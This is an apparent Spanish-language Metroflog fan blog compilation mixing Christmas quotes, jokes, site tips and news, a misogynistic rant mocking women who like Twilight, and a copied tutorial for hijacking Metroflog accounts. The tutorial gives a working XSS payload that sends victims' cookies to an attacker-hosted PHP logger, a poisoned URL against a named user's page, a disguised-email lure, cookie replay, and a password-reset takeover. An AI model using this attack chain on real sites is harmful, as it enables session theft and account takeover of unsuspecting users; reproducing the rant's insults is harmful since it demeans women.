No existe la Navidad ideal, solo la Navidad que usted decida crear como reflejo de sus valores, deseos, queridos y tradiciones. (Bill McKibben)

Tal vez el mejor adorno de navidad es una gran sonrisa.

La Navidad no es un momento ni una estación, sino un estado de la mente. Valorar la paz y la generosidad y tener merced es comprender el verdadero significado de Navidad. (Calvin Coolidge)

Ojala pudiesemos meter el espiritud de navidad en jarros y abrir un jarro cada mes del año. (Harlan Miller)

Honraré la Navidad en mi corazón y procuraré conservarla durante todo el año. (Charles Dickens)

Bendita sea la fecha que une a todo el mundo en una conspiración de amor. (Hamilton Wright Mabi)

¿Qué es la Navidad? Es la ternura del pasado, el valor del presente y la esperanza del futuro. Es el deseo más sincero de que cada taza se rebose con bendiciones ricas y eternas, y de que cada camino nos lleve a la paz. (Agnes M. Pharo)

¡Feliz, feliz Navidad, la que hace que nos acordemos de las ilusiones de nuestra infancia, le recuerde al abuelo las alegrías de su juventud, y le transporte al viajero a su chimenea y a su dulce hogar! (Charles Dickens)

Si no sabes qué regalar a tus seres más queridos en Navidad, regáleles tu amor.

Viene cada año y vendrá para siempre. Y con la Navidad vienen los recuerdos y las costumbres. Esos recuerdos cotidianos humildes a los que todas las madres nos agarramos. Como la Virgen María, en los rincones secretos de su corazón. (Marjorie Holmes)

Mejor que todos los regalos debajo del árbol de navidad es la presencia de una familia feliz.

Aunque se pierdan otras cosas a lo largo de los años, mantengamos la Navidad como algo brillante.…. Regresemos a nuestra fe infantil. (Grace Noll Crowell)

La Navidad! La propia palabra llena nuestros corazones de alegría. No importa cuánto temamos las prisas, las listas de regalos navideños y las felicitaciones que nos queden por hacer. Cuando llegue el día de Navidad, nos viene el mismo calor que sentíamos cuando éramos niños, el mismo calor que envuelve nuestro corazón y nuestro hogar. (Joan Winmill Brown)

La Navidad…..no es un acontecimiento, sino una parte de su hogar que uno lleva siempre en su corazón. (Freya Stark)

Para los buenos momentos, gratitud.

Para los malos, mucha esperanza.

Para cada día, una ilusión.

Y siempre, siempre, felicidad.

Esto es lo que te deseo para el 2008. (Mari Carmen)

Apoco no odias estas firmas?

1.-Hola te quiero decir algo muy importante (mira la 4)
2.-Al fin la respuesta esta en la 8
3.-Aquí estoy, mira la 9
4.-Ahora mira la 7
5.-Esta en la 10
6.-Ya estas harto verdad, mira la 2
7.-Después mira la 3
8.-Solo quería decirte que tu pick esta chida, bye
9.-Oye esta en la 5 heeeee
10.-No aquí no esta, pero si en la 6

Si eres uno de los ….. tontos que firman asi pues deja de  hacerlo xD .

Fuente: lomejordelmetroflog.net

Aqui te dejo unas imagenes para esta navidad 2009 adorna con ellas tu metroflog!!!!  ya sea con un arbol de navidad, un santa claus, o un feliz navidad…. hay de varios tipos esperemos que te gusten.

Si bien siempre hay cine bueno y malo, peliculas  que no ganan un oscar pero siempre son palomeras y te divierten, pero también siempre hay porquerias que llegan a nuestra vida como el regetton entre otras cosas.

Hoy toca hablar de la porquería llamada Luna nueva y Crepúsculo. Una historia carente de sentido común que solo esta hecha para aquellas chavas  feas, solteronas que la única manera de que se les moje el calzón es ir a ver a un vampiro u hombre lobo sin camisa. Ya que en la vida real nadie las pelaría.

Lo peor de todo es que se atreven a comparar esta historia con la vida real, y piensan que en algún momento, y en alguna parte de su miserable vida un Edward Cullen va llegar a su vida y hacerla feliz.  Pero nooooooooooooooooooooooooooooooooooo chicas, les vengo a decir que los principes azules no existen. Así como nosotros (los hombres) no esperamos tener una aventura sexual con una estrella de porno o tener relaciones sexuales con Carmen Electra ustedes deberían hacer lo mismo y dejarse de mentir a ustedes mismas.

Cuando se ponen analizar las peliculas más exitosas de mujeres y hombres. Nos damos cuenta que las de las mujeres su fin es encontrar al mejor hombre y vivir en el amor, las de hombres tratan de siempre demostrar y ser el mejor.

Es una gran diferencia y la triste realidad. Por eso las mujeres no progresan, eligen las  peores porquerías como símbolos en sus vidas.

Para todos aquellos usuarios de españa queremos decirle que la red social más importante de este pais ha sacado una versión para telefonos celulares.

En respuesta a la guerra contra facebook, tuenti ha decidido sacar su propia versión móvil de su red social. Y es que muchos nuevos celulares traen una aplicación facebook default  por que aunque tuenti gana en españa, facebook sigue siendo el lider mundial en las redes sociales.

Sin embargo esta versión llamada tuenti movil trae muchas opciones y no le pide nada a la aplicación de facebook. Incluso ahora se esta desarrollando la opción para que puedas subir tus fotos directamente desde tu movil.

Hola amigos del metroflog!, bueno acá les voy a dejar el código de los trucos para que el titulo de su metroflog se vea mas lindo

1_ Color de fondo en el titulo de tu metroflog:

*Si queres que el fondo del titulo en tu metro sea, por ejemplo, verde, entonces vas a tener que ir a configuración y cambiar el fondo de tu metro en verde, luego pones el titulo que quieras( el modelo de letra y color no difiere).

*Luego de haber cambiado el fondo y el titulo a tu gusto, volves a configuración y borras el titulo que pusiste anteriormente y en su lugar pones este código ºº€€€€♬♬♬♬♬♬€€€€ºº , en el momento de haber puesto el código del truco cambias el fondo de tu metro al color que tenia antes del item anterior u otro color a elección y listo!

Si no te quedo claro, ve el ejemplo de mi metro, tiene un titulo de fondo amarillo, pero antes tuve que cambiar todo el fondo de ese color (el modelo de letra y color de titulo no interesa), luego fui otra vez a configuración, borre el “bienvenidos”, puse el código, cambie color de fondo a negro y ya esta, quedo como lo ven.

2_ Titulo con rectángulo de letras:

Es muy sencillo, Básicamente mete este código, ^#^#^#^#^ y lo personalizas con el tipo de letra adriator , nada mas ustedes le cambian al color de su preferencia, y el resultado es el que se muestra en la primer imagen de la foto de mi post.
Si queres que solo aparezcan los rectángulos con letras solo pone de titulo el código ^^^^^ (recorda que el estilo de letra debe ser adriator, sino no funciona), el resultado es el que se muestra en la segunda imagen de mi post.

3_Titulo parpadeante:

Esta opción ya no funciona, puesto que metroflog corrigió ese bug, pero funcionaba de manera simple, te ibas a configuración, borrabas el tutulo que tenias anteriormente y luego ponias cualquiera de estos codigos €€€ºº****ºº€€€, ◣€€€°°**◣◣◣◣**°°€€€
, °°€€€°°****°°€€€°°, guardabas los cambios y listo, parpadeaba el titulo de tu metroflog , si ves que algun usuario lo tiene todavía, es porque obviamente lo hizo antes de que metroflog lo corrigiera, pero si lo haces no va a funcionar este “truco”.

- FACEBOOK

-TWITTER

-MYSPACE

-HI5

-OTRO.

Voten comentando.

Bueno tratare de explicar lo que he encontrado en los titulos de metroFLOG. primero se debe de tener en cuenta los signos ?* Y { El signo ? significa algo asi como “Empezar a trabajar”. El signo * significa “todos los caracteres”. El signo { significa algo asi como “acabar de trabajar”. Para hacerlo mas claro les dire que lo que muestra en los titulos son los nombres de los archivos que hay en el servidor de metroFLOG y para encontrar algun archivo debemos poner la(S) letra(S) que buscamos acompañadas de esos caracteres , al parecer todos los archivos estan en minusculas. Para encontrar algun archivo que empiece con una letra debemos poner de la siguiente forma: letra?*{ ejemplos: p?*{ O r?*{ Las letras con que empiezan los archivos son: c p w r t i a s d f g h l b m Para encontrar algun archivo que termine con una letra debemos poner de la siguiente forma: ?* letra{ ejemplo: ?*m{ Las letras con que terminan los archivos son: l m p Para encontrar algun archivo que contenga despues de la primera letra y antes de la ultima un caracter debemos poner de la siguiente forma:
?*letra*{ ejemplo: ?*y*{ Los caracteres que contienen en medio los archivos son: 1 2 3 4 5 6 7 8 9 0 . _ q w e r t y u i o p a s d f g h k l < x c v b n m Tambien podemos combinar la forma de buscar titulos, ejemplo: c?*p*{ empieza con C y contiene en medio W algunos titulos que no he visto en otras partes que encontre:
repli_test.php
robots.txt
class.smtp.inc
terms.php
incorrectas_inc.php
sitemap_index.xml
chars.csv
changepassword.php
calendar.php
cancelaccount.php
check_dbs.php
privacy.php
private.php
test_ip.php
warning.php
top_others.php Estos entre muchos mas que hay por ahi.Ahora les dire una cosita curiosa, si tu escribes en la barra de direcciones de tu navegador: http://www.metroflog.com/ y el nombre de algun archivo de estos vas a encontrar que se despliegan en tu navegador, algunos de ellos, la mayoria por cierto, tu ya los conoces,pero existen algunos que no y que contienen alguna informacion medio rara que les dejo para que la revisen:

JAJAJAJAJ NO SE SI REIR O LLORAR.

Este tutorial es bueno y me lo encontre en este blog: http://trucosmf2009. blogspot.com/

Disfrutenlo.

.:: Introduccion ::..

Pues este sera al primer tutorial que pondre aqui en mi blog, y al parecer sera uno muy bueno. Si se ponen a buscar en internet (llamese San Google) acerca de como hackear Metroflog, dudo que encuentren algo verdaderamente bueno, como esto que les voy a poner. Si llegan a encontrar algo sera o un Scam o que existe la vulnerabilidad XSS, que es la que ya habia publicado desde el año pasado.

El Scam se vuelve una tecnica complicada comparada contra esto que les voy a poner aqui. Ademas ya la gente no es tan tonta como para caer en los Scam (ahahaha, es broma, la neta hay muchisima todavia xD).

Esta tecnica que voy a explicar aprovecha la vulnerabilidad XSS, que es un error que se encuentra un muchas otras paginas, asi que el procedimiento, funciona para cualquier otra pagina con el mismo error, por lo que lo que les voy a poner no es ningun truco nuevo, simplemente intento dejar claro, como se llevaria a cabo en el caso de Metroflog.

..:: Entendiendo la Vulnerabilidad XSS ::..

Antes de empezar a explicar como aprovechar la vulnerabilidad, entendamos como es. El XSS segun Wikipeda es “un tipo de inseguridad informática o agujero de seguridad basado en la explotación de vulnerabilidades del sistema de validación de HTML incrustado.” No manchen, se escucha chido, pero no se si se entendio, asi que tratare de explicarlo con mis palabras.

El XSS es un error de programacion en paginas web, a traves del cual se puede hacer una inyeccion de codigo en HTML o Javascript, a traves de una variable que utilice la misma pagina web. Por la misma naturaleza de esos lenguajes de programacion, sabemos que no pueden afectar directamente al servidor donde se encuentra alojada esa pagina Web, y sabemos que solo se ejecutaran de manera local en donde hayamos hecho la inyeccion.

En el caso de Metroflog, la variable que es vulnerable es la variable “pos”. Esta variable se vuelve visible para nosotros cuando damos en click en una de las fotos pequeñas que aparecen arriba en los metroflogs, que vienen siendo las fotos anteriores. Si entramos directamente al metroflog, no veremos esta variable en nuestro explorador.

Hasta ahi, al parecer no es una vulnerabilidad grave, pero creanme, lo es. Y se vuelve mas grave, cuando en la pagina web se manejan coockies (no pienso explicar que son las coockies), y por lo general manejamos coockies en las webs donde nos podemos registrar (hotmail, gmail, yahoo, metroflog, blogspot, una infinidad de paginas, etc).

..:: El ingenio del ataque XSS ::..

Bien, ahora viene la parte ingeniosa de este ataque: si el codigo inyectado solo puede ser HTML o Javascript, y solo es de manera local ¿Como Hackeo un Metroflog con eso?. Bien veamos la cadenita.

Alguien alguna vez me dijo que a este metodo de analisis se le llamaba “Reduccion a lo absurdo” y funciona de esta forma:

Quiero llegar a Hackear un metro, ese es el objetivo final, y puedo lograrlo de dos formas: o conociendo la contraseña o conociendo los valores de todas las coockies. Este metodo esta encaminado a las coockies y entonces asi lo explicare, aunque de todos modos mas adelante explico como sacar la contraseña tmb (h).

Bien, ya se que obteniendo las coockies, hackeare ese metro, pero ¿Como obtengo las cookies?. Pues con codigo Javascript es posible acceder a esos valores, a traves de document.cookie que es una como variable que guarda los valores de las cookies.

Hasta aqui como que ya va agarrando forma. Pero si accedo a document.cookie inyectando codigo en mi computadora, pues solo vere mis coockies. Y si hago (que no es facil, pero mas abajo explico el metodo) que alguien mas inyecte ese codigo en su computadora, pues solo lo veran ellos =O. Este es un nuevo problema, ¿Como le hago para que esa persona inyecte ese codigo en su computadora, pero que yo tambien pueda ver el valor de esas coockies?

Este nuevo dilema lo podriamos resolver, si de alguna forma ejecutaramos PHP tambien, ya que PHP si se ejecuta directamente en el servidor, de esa forma, el valor de esas cookies las podriamos guardar en otro archivo que se encuentre en el mismo servidor. Ahora un nuevo dilema ¿Como ejecuto PHP desde Javascript? ¿Es posible?

La respuesta es “Si!” xD. Utilizando una pequeña redireccion en javascript, podemos linkear a un codigo en PHP, y a traves del metodo GET pasarlo a alguna variable que este contenida en nuestro archivo PHP y asi almacenarlo en un nuevo archivo, al cual nosotros tenemos acceso. Esa fue la rapida explicacion del ingenio de esta tecnica, que no es elite ni h4x0r en ningun sentido, cabe destacar eso.

..:: ¿Que se necesita para poner en practica esta tecnica? ::..

Pues lo que necesitamos para hackear un metro es lo siguiente:

* Metroflog de nuestra victima
* Su cuenta de correo (Esto es opcional, ahorita explico por que, aunque tener el correo es la mejor opcion)
* Un archivo en javascript
* Un archivo en PHP
* Hosting para almacenar los archivos.

..:: Aplicando nuestra tecnica de manera detallada::..

Bien, primero una ves entendida la explicacion, vayamos a lo bueno: los codigos. Estos codigos no son nuevos, ni mucho menos, de hecho es muy facil encontrarlos en muchisimas paginas, el hecho es saberlos utilizar bien.

El codigo en javascript es una sola linea de codigo y seria el siguiente:

window.location=’http://www.tu-host.com/roba_cookies.php?cookie=’+document.cookie

Esa linea de codigo la guardamos con extension .js, y le damos el nombre que sea, en este caso yo la llamare “redireccion.js”. Si nos damos cuenta, utiliza la funcion windows.location, que sirve para direccionar; ahi nos esta mandando al archivo php que se llama “roba_cookies.php” y que tiene una variable llamada coockies que toma el valor de “document.cookie”, es decir las cookies de metroflog de nuestra victima =).

NOTA: el codigo del siguiente archivo php debe llevar en la primera linea de codigo el “<” seguido de “?”, solo que no se lo puse ya que al parecer se interpreta. Ahora veamos como seria el codigo del archivo “roba_cookies.php”:

$cookies = $_GET['cookies'];
$guardando = fopen(“cookies.txt”,”a”);
$ip = $_SERVER['REMOTE_ADDR'];
$hora = date(“G:H:s”);
fwrite($guardando, “IP: $ip \n”);
fwrite($guardando, “Hora: $hora \n”);
fwrite($guardando, “Valores de las cookies: \n”);
fwrite($guardando, “$cookies \n”);
fclose($guardando);
?>

¿Lo explico? Ok, lo hare linea por linea. Primero a traves del metodo GET le da el valor a $cookies con el valor de document.coockie. Despues ejecuta la accion de abrir y poder escribir en un archivo llamado cookies.txt. Obtiene la IP de nuestra victima. Obtiene la Hora actual del servidor. Escribe la IP. Escribe la Hora. Escribe “Valores de las cookies:”. Escribe el valor de las cookies.

Bien. ya tenemos los codigos que necesitamos. Pero ahora necesitamos algo mas, el link que realiza la inyeccion del codigo javascript. Voy a utilizar la pagina de alguien desconocido como ejemplo, aunque no le haremos daño a su metro, solo sera para que vean como funcionan las inyecciones.

Usemos el metro de Claudia xD: 

Y veamos que exite el link 

Si nos fijamos, la variable “pos” es la fecha de publicacion de esa foto 22 de noviembre del 2008. Bueno, eso no nos interesa, haha, solo era un comentario. Existe otra variable llamada nf, que la verdad no nos ayuda ni nos perjudica.

Veamos con un ejemplo como funciona esta inyeccion: http://www.metroflog.com/dangerously-cute/20081122/?pos=%22%3E%3Cscript%3Ealert(/Owned%20by%20mx0x/)%3C/script%3E

Si damos click, en el link anterior, nos abre el metro y nos salta un mensaje. Justamente eso hace la funcion alert de javascript. Es solo una forma de comprobar la vulnerabilidad. Ahora vayamos al link que nos interesa, la Poisoned URL, haha, bueno, la URL que nos direccion al codigo en javascript.

http://www.metroflog.com/dangerously-cute/20081122/?pos=%22%3E%3Cscript src=”http://www.tu-host.com/redireccion.js”>

Va de nuevo, dando click en el link anterior, nos hace llegar al metro, pero rapidamente, nos redireccion al archivo en javascript, que nuevamente, nos manda al archivo php que guarda los valores de las coockies en un archivo de texto, al cual tenemos acceso.

El archivo de texto que almacena las cookies guardaria cada registro de la siguiente manera:

IP: 127.0.0.1
Hora: 8:08:49
Valores de las cookies:
__utma=18306213.2086185802.1223149270.1231378158.1231397360.68; __utmz=18306213.1231378158.67.30….

..:: ¿Como le hago para hacer que la otra persona entre en ese link tan raro? ::..

Es facil jo jo. Puede ser de mil formas, pero una que se me ocurre es la siguiente. Cuando alguien sube una foto a un metro, algunas de las veces, se spamea el correo de sus contactos con un correo que dice “Te invito a ver mi Metroflog” o algo asi. Entonces podemos enviar un correo de esos, donde diga lo mismo, pero modificando el link, de modo que parezca normal, pero que al darle click nos mande al link con el codigo.

El link podria ser como este: http://www.metroflog.com/dangerously-cute A simple vista parece que solo nos manda al metro, pero al darle click nos ejecute el codigo. Muy poca gente, se daria cuenta de que en la barra de abajo del explorador aparece la direccion completa. Bien esa es una forma, pero se pueden ingeniar muchas otras, como por ejemplo cambiar los caracteres por su valor en ascii, ocultando los links.

..:: Ya tengo los valores de las cookies ¿Y ahora? ::..

Pues lo que sigue es crearse la cookie, para eso recomiendo usar FireFox y el addon de Cookie Editor (xD?). De esa forma sera tan facil como editar un campo de texto por cada cookie. Con el editor veremos listada cada variable, al darle click a una de ella, nos mostrara su valor en la parte que dice content. Solo sera cuestion de darle al boton de Edit y cambiar ese valor, por los valores almacenados por el archivo PHP. Se debe de ver algo mas o menos como se muestra en la siguiente imagen:

Una vez editadas todas las cookies con los valores guardados, refrescamos el metroflog, y automaticamente estaremos logeados como ese usuario xD. Y sin necesidad de conocer su contraseña, esto es muy importante. Ahora ya podremos hacer lo que sea: subir fotos, borrar comentarios, cambiar colores, postear en otros metros con ese usuario, etc.

Este es un metro que ownee desde el año pasado, cuando andaba checando esta vulnerabilidad, aqui les dejo el screen:

http://i155.photobucket.com/albums/s292/FhUrER/ownedtifaa.jpg

..:: Ya tengo las cookies y ya hice maldades, pero quiero mas ¿Como obtengo la contraseña? ::..

Metroflog tiene otro detalle, que podria considerarse como error. Una vez logeado como el usuario podremos acceder al panel, pero no podremos cambiar la contraseña, ya que nos pide la contraseña actual, la cual no conocemos x_x. Sin embargo, podemos cambiar el correo, jo jo. Cambiamos el correo por uno nuestro, para realizar este cambio no nos pide la contraseña, solo una pequeña comprobacion que es enviada a nuestro correo.

Una vez cambiado el correo, le damos en Log Out o en Salir. Y vamos a www.metroflog.com y le damos en Olvidaste tu contraseña? (xD). Ahi nos pide el e-mail, que ya es el nuestro, le damos en Enviar y listo!! la contraseña nos llegara asi de facilmente a nuestro correo =) Ahora ya tenemos totalmente owneada la cuenta de metroflog, ya que asi ya podemos cambiar la contraseña.

..:: Comentarios finales ::..

Pues solo quiero comentar que “no hagas, lo que no te gustaria que te hicieran, aunque si estas seguro de que no te lo pueden hacer, entonces hazlo xD”. Este metodo, como se habran dado cuenta es basicamente hacer click sobre un link y listo, tu metroflog sera owneado. Asi que tengan cuidado!, fijense en donde hacen click, porque en una de esas te tumban el metro. Por eso no usen esas cosas, usen Blogs, y recomiendo Blogspot, la verdad. Luego hare un post de MetroFlog VS Blogspot y veran que paliza!! hahaha. Bien, este es un verdadero metodo de como hackear una cuenta de MetroFlog, espero haber sido lo suficientemente explicito, espero que les sea util y les haya gustado.

NOTA: Ya lo habia dicho, esto no es elite, no te vuelve hacker. De hecho tal vez no debi haber usado la palabra “hack”, simplemente es ownear una cuenta.

No se cuantos de ustedes vean caricaturas. Pero creo que  muchos de nosotros tenemos aquel espíritu caricaturesco todavía. Recuerdo que cuando tenia su edad unos 15 o 16 años me emocionaba con goku y era lo que me tenia frente a la tv todos los días a las 8 de la noche. La mayoria de estas series son trasmitidas por el canal Cartoon Network de los más populares.

Ahora naruto es una de los mejores anime que existen, entre avatar -el ultimo maestro del aire !que ya esta por salir la película¡ y tambien ben 10, bakugan entre otros.